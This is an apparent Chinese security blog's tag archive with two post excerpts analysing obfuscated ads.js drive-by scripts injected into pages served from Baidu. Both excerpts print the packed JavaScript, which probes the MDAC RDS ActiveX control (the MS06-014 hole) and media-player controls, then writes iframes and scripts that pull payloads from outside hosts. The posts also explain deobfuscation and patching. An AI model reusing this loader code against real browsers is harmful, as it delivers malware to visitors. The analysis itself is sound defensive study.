Tag Archives: ads.js

ads.js新变种(err.www404.cn:53/ads.js)?又是百度

Posted on May 6, 2008 by 白菜林

这个地址是在telnet百度的时候发现的: <script language=”javascript” SRC=”http://err.www404.cn:53/ads.js”></script> 把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。 ads.js源码: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘A B(){}f.L=B;b(4.t.G(\’s\’)==-1){z()}A z(){2 p=”Q:N”+”Y”+”-Z-V”;2 y=”0-R”+”-10″;2 v=p+y;2 9=”[x O]“;h{2 e;2 w=(4["P"+"U"](“x”));w["X"](“W”,v);f["E"]["D"](“C”+”F.”+”S”+”M”+”e”+”K”,””)}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\’s=1s;1n=/;a=\’+a.1j();4.8(“<r 1l=1k:1h 6=7://d.c.5/1m.g></r>”);4.8(“<3 6=7://d.c.5/11.g></3>”);b(e!=9){}1r{h{2 1q=i f["l"](“1o.1p”);2 n}k(n){};j{b(n!=9){4.8(“<3 6=7://d.c.5/1i.g><\\/3>”)}}h{2 q=i f["l"](“1g”+”16.17″+”15.1″);2 m}k(m){};j{b(m!=9){4.8(“<3 6=7://d.c.5/q.g><\\/3>”)}}h{2 14=i f["l"](“12″+”13.I”+”18.1″);2 o}k(o){};j{b(o!=9){4.8(“<3 6=7://d.c.5/19.g><\\/3>”)}}}}}4.8(“<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>”);’,62,91,’||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely’.split(‘|’),0,{})) ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么): function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf(‘MyCookie’)==-1){exit()}function … Continue reading

Posted in 今日一点, 病毒学习 | Tagged , , , , | Leave a comment

『u.asdafdgfgf.com/ads.js分析,临时解决办法』百度怎么啦,还是我怎么啦,还是…

Posted on April 21, 2008 by 白菜林

不清楚是不是百度出问题啦,总之打开其他网页都是正常的现在,就是百度打开显示不了,要刷新(重试)几遍才会出来,再刷新就又没啦,不知道是不是我的机子有问题(现在没发现可疑情况啊!)还是我处的网络有问题(至少局域网中现在就我一人在线!)! 为啦方便我就直接把图片这样插入啦,需要的话就点开看吧,不需要就直接下文。 假象就是假象,qq使用的最多,现在局域网中也并不是我一人在线,因为在此查看攻击记录最后一次攻击的时间是23:55而我访问百度的时间也大概是这个时间,现在是当前时间:  0:08:43.92 。可惜他不能利用我的漏洞。 下边看看这个漏洞利用js代码: eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+c+’\\b’,’g’),k[c])}}return p}(’18(7.41.57(\’43\’)==-1){23{8 38;8 39=(7.56(“10″));39.55(“54″,”58:53-59-64-63-62″);8 61=39.65(“49.46″,””)}20(38){};27{8 32=22 44();32.45(32.52()+24*60*60*51);7.41=\’43=50;47=/;32=\’+32.48();7.14(“<16 25=9://11.12.13/6.26><\\/16>”);18(38!=”[10 15]“){7.14(“<16 25=9://11.12.13/1.26><\\/16>”)}82{23{8 36;8 81=22 30(“80.79″)}20(36){};27{18(36!=”[10 15]“){7.14(“<16 25=9://11.12.13/2.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 37;8 83=22 30(“84.85.1″)}20(37){};27{18(37!=”[10 15]“){7.14(“<16 25=9://11.12.13/3.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 35;8 77=22 30(“78.70″)}20(35){};27{18(35!=”[10 15]“){7.14(“<16 25=9://11.12.13/4.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 33;8 66=22 … Continue reading

Posted in 今日一点, 技术分析, 病毒学习 | Tagged , , , , , | Leave a comment